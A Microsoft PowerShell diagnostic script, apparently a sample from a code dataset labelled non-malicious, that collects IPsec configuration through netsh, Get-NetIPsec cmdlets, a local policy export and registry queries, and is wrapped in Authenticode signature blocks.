6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991 // SIG // bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib // SIG // V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x // SIG // ghmeMIIZmgIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG // SIG // A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u // SIG // ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n // SIG // IFBDQSAyMDExAhMzAAADri01UchTj1UdAAAAAAOuMA0G // SIG // CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor // SIG // BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE // SIG // AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCCgSZ0QxzPX610j // SIG // Qf8z2jZZzRsNUMdZZ5cMEw9FRhQ31TBCBgorBgEEAYI3 // SIG // AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY // SIG // aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3 // SIG // DQEBAQUABIIBAMQEskNuBJFYZjXiGw7ihRVMFlkIvAKm // SIG // kriqlul37ASmcZArOp9b9vDFHYf3qOpOlGPQyTVC6pn5 // SIG // fRKOAppg4PrzCUDqtuPttQeSUJbtBNqsem3Z8XBZwp3A // SIG // BeS/6o6RIHgFISkkgh2FW1nVWQupqpO8+HQBJ5q6Kc75 // SIG // VeNBGCOxDQTDuqPH6M+mu0sfqCAF4c0NMSudsINdl+lI // SIG // HDgaeGXenfJooX94RyjOnGgDwQXwbiNt0X/5QykFMcAQ // SIG // zYfsNw/m06K69Pd14ryqztMxgUuTpcFo3tXzmikfoZ8O // SIG // gzDWDb+JJpBqUJuqZNhloP5Re6ZYp8ubR4OK53pbeBf4 // SIG // M/ahghcoMIIXJAYKKwYBBAGCNwMDATGCFxQwghcQBgkq // SIG // hkiG9w0BBwKgghcBMIIW/QIBAzEPMA0GCWCGSAFlAwQC // SIG // AQUAMIIBWAYLKoZIhvcNAQkQAQSgggFHBIIBQzCCAT8C // SIG // AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg // SIG // vYKsKBLCMcDN/M4mCf9rgCQOSt1ZmU3+l/5y/mzBunoC // SIG // BmXxz6losRgSMjAyNDA0MTAxNzE5MDAuMTNaMASAAgH0 // SIG // oIHYpIHVMIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMK // SIG // V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG // SIG // A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYD // SIG // VQQLEyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25z // SIG // IExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO // SIG // OjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3Nv // SIG // ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUP // SIG // oAMCAQICEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJKoZI // SIG // hvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQG // SIG // A1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw // SIG // MTAwHhcNMjMxMDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1 // SIG // WjCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp // SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT // SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk // SIG // TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1p // SIG // dGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0 // SIG // LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRp // SIG // bWUtU3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEB // SIG // BQADggIPADCCAgoCggIBAKl74Drau2O6LLrJO3HyTvO9 // SIG // aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIY // SIG // SyJHjkMIUGmuh0rPV5/2+UCLGrN1P77n9fq/mdzXMN1F // SIG // zqaPHdKElKneJQ8R6cP4dru2Gymmt1rrGcNe800CcD6d // SIG // /Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/PllqcM/e // SIG // WntkQMs0lK0zmCfH+Bu7i1h+FDRR8F7WzUr/7M3jhVdP // SIG // pAfq2zYCA8ZVLNgEizY+vFmgx+zDuuU/GChDK7klDcCw // SIG // +/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1JVqpP3dpK // SIG // PAP/4udNqpR5HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWN // SIG // YQ7gsezuDWM/8cZ11kco1JvUyOQ8x/JDkMFqSRwj1v+m // SIG // c6LKKlj//dWCG/Hw9ppdlWJX6psDesQuQR7FV7eCqV/l // SIG // fajoLpPNx/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3z // SIG // Xux9tNQmz2L96TdxnIO2OGmYxBAAZAWoKbmtYI+Ciz4C // SIG // YyO0Fm5Z3T40a5d7KJuftF6CToccc/Up/jpFfQitLfjd // SIG // 71cS+cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHl // SIG // I5zdJzJnGskVJ5ozhji0YRscv1WwJFAuyyCMQvLdmPdd // SIG // AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU3/+fh7tNczEi // SIG // fEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D // SIG // 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0 // SIG // cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwv // SIG // TWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIw // SIG // MTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEF // SIG // BQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3Br // SIG // aW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1w // SIG // JTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIw // SIG // ADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNVHQ8B // SIG // Af8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBADP6whOF // SIG // jD1ad8GkEJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLci // SIG // mrJlDnKGgFBiWwI6XOgw82hdolDiMDBLLWRMTJHWVeUY // SIG // 1gU4XB8OOIxBc9/Q83zb1c0RWEupgC48I+b+2x2VNgGJ // SIG // UsQIyPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV // SIG // 23EUwFeO5+3oSX4JeCNZvgyUOzKpyMvqVaubo+Glf/ps // SIG // fW5tIcMjZVt0elswfq0qJNQgoYipbaTvv7xmixUJGTbi // SIG // xYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjD // SIG // YZyeHyAysMEALbIhdXgHEh60KoZyzlBXz3VxEirE7nhu // SIG // cNwM2tViOlwI7EkeU5hudctnXCG55JuMw/wb7c71RKim // SIG // ZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si36Tql // SIG // 84VfpYe9iHmy7PqqxqMF2Cn4q2a0mEMnpBruDGE/gR9c // SIG // 8SVJ2ntkARy5SfluuJ/MB61yRvT1mUx3lyppO22ePjBj // SIG // nwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTDC+TdZQlj // SIG // +VMgIm8ZeEIRNF0oaviF+QZcUZLWzWbYq6yDok8EZKFi // SIG // RR5otBoGLvaYFpxBZUE8mnLKuDlYobjrxh7lnwrxV/fM // SIG // y0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIBAgITMwAAABXF // SIG // 52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDEL // SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x // SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv // SIG // c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9z // SIG // b2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw // SIG // MTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 // SIG // WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu // SIG // Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV // SIG // TWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N // SIG // aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIw // SIG // DQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzn // SIG // tHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2AX9s // SIG // SuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWN // SIG // E893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFc // SIG // UTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2vjUm // SIG // ZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W // SIG // 7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0 // SIG // hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3rMvrg0Xn // SIG // Rm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De // SIG // +JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXf // SIG // tnIv231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SU // SIG // HDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO // SIG // ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten // SIG // IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh // SIG // 8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6bMUR // SIG // HXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54W // SIG // cmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEE // SIG // AYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQqp1L+ // SIG // ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBe // SIG // Yl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEE // SIG // AYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDovL3d3 // SIG // dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9z // SIG // aXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkG // SIG // CSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQE // SIG // AwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaA // SIG // FNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0w // SIG // S6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9w // SIG // a2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw // SIG // LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB // SIG // BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w // SIG // a2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMu // SIG // Y3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9n // SIG // ATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2 // SIG // P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03dmLq2 // SIG // HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1 // SIG // AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3 // SIG // lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8F7BU // SIG // hUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tu // SIG // PywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZ // SIG // lvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdU // SIG // bZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz // SIG // 138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFH // SIG // qfG3rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xB // SIG // Zj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 // SIG // Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 // SIG // 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784 // SIG // cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQtB1V // SIG // M1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jEL // SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x // SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv // SIG // c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z // SIG // b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYw // SIG // JAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRCODAt // SIG // NjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3Rh // SIG // bXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYF // SIG // rsE4wzWDd85EpM6RiwqggYMwgYCkfjB8MQswCQYDVQQG // SIG // EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE // SIG // BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv // SIG // cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGlt // SIG // ZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF // SIG // AOnBNgowIhgPMjAyNDA0MTEwMDAwMTBaGA8yMDI0MDQx // SIG // MjAwMDAxMFowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA // SIG // 6cE2CgIBADAHAgEAAgIzwjAHAgEAAgISATAKAgUA6cKH // SIG // igIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZ // SIG // CgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqG // SIG // SIb3DQEBBQUAA4GBAHn0MAPBqT2k7pkyjIQQr/xHgtus // SIG // DZPXycTbUNXGIT3jyknz5jfiAIP4R74+jpXhfJ4U5TVC // SIG // FULUEvajYAYGh9YvocS87sTQiIr79Xa3Z1ttnGnlW1P/ // SIG // +eEy6IjYVhveqoSQTORnZtctsHkLgHLXx4BT61y583lk // SIG // /PnH9J3d7V1yMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE // SIG // BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNV // SIG // BAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD // SIG // b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp // SIG // bWUtU3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MA // SIG // AQAAAeUwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3 // SIG // DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx // SIG // IgQgS0RJaEewROmJj9HjCEOPiJgVzUzrbE1+gxm1wo4V // SIG // vREwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCAV // SIG // qdP//qjxGFhe2YboEXeb8I/pAof01CwhbxUH9U697TCB // SIG // mDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpX // SIG // YXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYD // SIG // VQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV // SIG // BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw // SIG // AhMzAAAB5Y9qwPM9tAujAAEAAAHlMCIEIH1g111bzYGA // SIG // T+D1bF+34NSiDMe03KrJ191UAZ82o3U1MA0GCSqGSIb3 // SIG // DQEBCwUABIICAH8iRfDhMbNb3fRYFtTfnQlg6nznlNIK // SIG // LCAFT9RPkdqvC4sEJKSBAWWDiHOrHIG2JfFCxTP+mawQ // SIG // DUFEh7aRdij5zEVjdFA0GeB+oCizdghnswwte4KHwiSV // SIG // Z4Let578v/URVfpfVa11ILHf24gMOg6PoG4Im4RXWQSy // SIG // kipeG9/ojXo+nBkimcVhyIHtUTzF3gFh7F6FrHHmXgIL // SIG // BFFwtJQ+pF88gUSAgh2mAjXdGSzgBi/grJc+wVIso9Bf // SIG // l2aBsDsYX1LpkbzpfxXD28cpwGgDl4s5F2Lhl6HSpnm4 // SIG // BR4FF3ZHK//5HkqelkO5RrVVaiYG92Qlp21B1NHkEJCm // SIG // UEhu1JSaemr6XrXxLMfZjkosD2SJP3Iq5CuHEFcN2Zuz // SIG // A6GDHxmvR01RkH5+SySTsiunUIL3lDqvm6vV6dAV6psK // SIG // 89X6lCvXBgKE1eX1zIjMYyxIJcOnRmN/95w4BoKkkdGp // SIG // KIi7BxDeA1zMMdI9L4atZxv0qRidb5WXOVmS0Wzf4e+g // SIG // claX5fP6FOc9j10Hwy62iI8NWmd0iWiDyr04F5F1Q3KW // SIG // u3WPRDDaS8wxhXM3AP7lxWNqbFpsQpdqlJo2xAbOrMic // SIG // jh9DfMW34Six0EIM2Flt+EquNziVQlzvJdHa4bsEZRVQ // SIG // PGGDpPWU4/he8jVR8XCJ1X7T6nLFGCi0c6om // SIG // End signature block
combined_dataset/train/non-malicious/sample_9_74.ps1
sample_9_74.ps1
#************************************************ # DC_IPsec-Component.ps1 # Version 1.0 # Version 1.1: Altered the runPS function correctly a column width issue. # Date: 2009-2014 # Author: Boyd Benson (bbenson@microsoft.com) # Description: Collects information about the IPsec component. # Called from: Main Networking Diag #******************************************************* Trap [Exception] { # Handle exception and throw it to the stdout log file. Then continue with function and script. $Script:ExceptionMessage = $_ "[info]: Exception occurred." | WriteTo-StdOut "[info]: Exception.Message $ExceptionMessage." | WriteTo-StdOut $Error.Clear() continue # later use return to return the exception message to an object: return $Script:ExceptionMessage } Import-LocalizedData -BindingVariable ScriptVariable Write-DiagProgress -Activity $ScriptVariable.ID_CTSIPsec -Status $ScriptVariable.ID_CTSIPsecDescription # detect OS version and SKU $wmiOSVersion = Get-CimInstance -Namespace "root\cimv2" -Class Win32_OperatingSystem [int]$bn = [int]$wmiOSVersion.BuildNumber function RunNetSH ([string]$NetSHCommandToExecute="") { Write-DiagProgress -Activity $ScriptVariable.ID_CTSIPsec -Status "netsh $NetSHCommandToExecute" $NetSHCommandToExecuteLength = $NetSHCommandToExecute.Length + 6 "`n`n`n" + "-" * ($NetSHCommandToExecuteLength) + "`r`n" + "netsh $NetSHCommandToExecute" + "`r`n" + "-" * ($NetSHCommandToExecuteLength) | Out-File -FilePath $OutputFile -append $CommandToExecute = "cmd.exe /c netsh.exe " + $NetSHCommandToExecute + " >> $OutputFile " RunCmD -commandToRun $CommandToExecute -CollectFiles $false "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append } function RunPS ([string]$RunPScmd="", [switch]$ft) { $RunPScmdLength = $RunPScmd.Length "-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append "$RunPScmd" | Out-File -FilePath $OutputFile -append "-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append if ($ft) { # This format-table expression is useful to make sure that wide ft output works correctly Invoke-Expression $RunPScmd |format-table -autosize -outvariable $FormatTableTempVar | Out-File -FilePath $outputFile -Width 500 -append } else { Invoke-Expression $RunPScmd | Out-File -FilePath $OutputFile -append } "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append } $sectionDescription = "IPsec" if ($bn -gt 9000) { $outputFile = join-path $pwd.path ($ComputerName + "_IPsec_info_pscmdlets.TXT") "========================================" | Out-File -FilePath $OutputFile -append "IPsec Powershell Cmdlets" | Out-File -FilePath $OutputFile -append "========================================" | Out-File -FilePath $OutputFile -append "Overview" | Out-File -FilePath $OutputFile -append "----------------------------------------" | Out-File -FilePath $OutputFile -append " 1. Get-NetIPsecDospSetting" | Out-File -FilePath $OutputFile -append " 2. Get-NetIPsecMainModeCryptoSet" | Out-File -FilePath $OutputFile -append " 3. Get-NetIPsecMainModeRule" | Out-File -FilePath $OutputFile -append " 4. Get-NetIPsecMainModeSA" | Out-File -FilePath $OutputFile -append " 5. Get-NetIPsecPhase1AuthSet" | Out-File -FilePath $OutputFile -append " 6. Get-NetIPsecPhase2AuthSet" | Out-File -FilePath $OutputFile -append " 7. Get-NetIPsecQuickModeCryptoSet" | Out-File -FilePath $OutputFile -append " 8. Get-NetIPsecQuickModeSA" | Out-File -FilePath $OutputFile -append "========================================" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append # This command exceptions on client skus #_#if ($bn -gt 9000) #_#if ($bn -ge 9000) #Get role, OSVer, hotfix data. #_# $cs = Get-CimInstance -Namespace "root\cimv2" -class win32_computersystem #-ComputerName $ComputerName #_# $DomainRole = $cs.domainrole #_# if (($bn -gt 9000) -and ($DomainRole -ge 2)) #_# not on Win8+,Win10 client { runPS "Get-NetIPsecDospSetting" # W8/WS2012, W8.1/WS2012R2 # fl } runPS "Get-NetIPsecMainModeCryptoSet" # W8/WS2012, W8.1/WS2012R2 # unknown runPS "Get-NetIPsecMainModeRule" # W8/WS2012, W8.1/WS2012R2 # unknown runPS "Get-NetIPsecMainModeSA" # W8/WS2012, W8.1/WS2012R2 # fl runPS "Get-NetIPsecPhase1AuthSet" # W8/WS2012, W8.1/WS2012R2 # unknown runPS "Get-NetIPsecPhase2AuthSet" # W8/WS2012, W8.1/WS2012R2 # unknown runPS "Get-NetIPsecQuickModeCryptoSet" # W8/WS2012, W8.1/WS2012R2 # unknown runPS "Get-NetIPsecQuickModeSA" # W8/WS2012, W8.1/WS2012R2 # fl CollectFiles -sectionDescription $sectionDescription -fileDescription "IPsec Powershell Cmdlets" -filesToCollect $outputFile } #----------Netsh $OutputFile = $ComputerName + "_IPsec_netsh_dynamic.TXT" "========================================" | Out-File -FilePath $OutputFile -append "IPsec Netsh Output (DYNAMIC)" | Out-File -FilePath $OutputFile -append "========================================" | Out-File -FilePath $OutputFile -append "Overview" | Out-File -FilePath $OutputFile -append "----------------------------------------" | Out-File -FilePath $OutputFile -append " 1. netsh ipsec dynamic show all" | Out-File -FilePath $OutputFile -append "========================================" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append RunNetSH -NetSHCommandToExecute "ipsec dynamic show all" CollectFiles -filesToCollect $OutputFile -fileDescription "IPsec netsh dynamic show all" -SectionDescription $sectionDescription $OutputFile = $ComputerName + "_IPsec_netsh_static.TXT" "========================================" | Out-File -FilePath $OutputFile -append "IPsec Netsh Output (STATIC)" | Out-File -FilePath $OutputFile -append "========================================" | Out-File -FilePath $OutputFile -append "Overview" | Out-File -FilePath $OutputFile -append "----------------------------------------" | Out-File -FilePath $OutputFile -append " 1. netsh ipsec static show all" | Out-File -FilePath $OutputFile -append "========================================" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append "`n" | Out-File -FilePath $OutputFile -append RunNetSH -NetSHCommandToExecute "ipsec static show all" CollectFiles -filesToCollect $OutputFile -fileDescription "IPsec netsh static show all" -SectionDescription $sectionDescription $filesToCollect = $ComputerName + "_IPsec_netsh_LocalPolicyExport.ipsec" $commandToRun = "netsh ipsec static exportpolicy " + $filesToCollect RunCMD -CommandToRun $commandToRun -filesToCollect $filesToCollect -fileDescription "IPsec Local Policy Export" -sectionDescription $sectionDescription #----------Registry $OutputFile= $Computername + "_IPsec_reg_.TXT" $CurrentVersionKeys = "HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec", "HKLM\SYSTEM\CurrentControlSet\Services\IPsec", "HKLM\SYSTEM\CurrentControlSet\Services\IKEEXT", "HKLM\SYSTEM\CurrentControlSet\Services\PolicyAgent" RegQuery -RegistryKeys $CurrentVersionKeys -Recursive $true -OutputFile $OutputFile -fileDescription "IPsec Registry keys" -SectionDescription $sectionDescription # SIG # Begin signature block # MIIoQwYJKoZIhvcNAQcCoIIoNDCCKDACAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCwI5X2MVP25ueF # cHJmS75fOdey8/8dl+SeqDNfYqIidKCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # 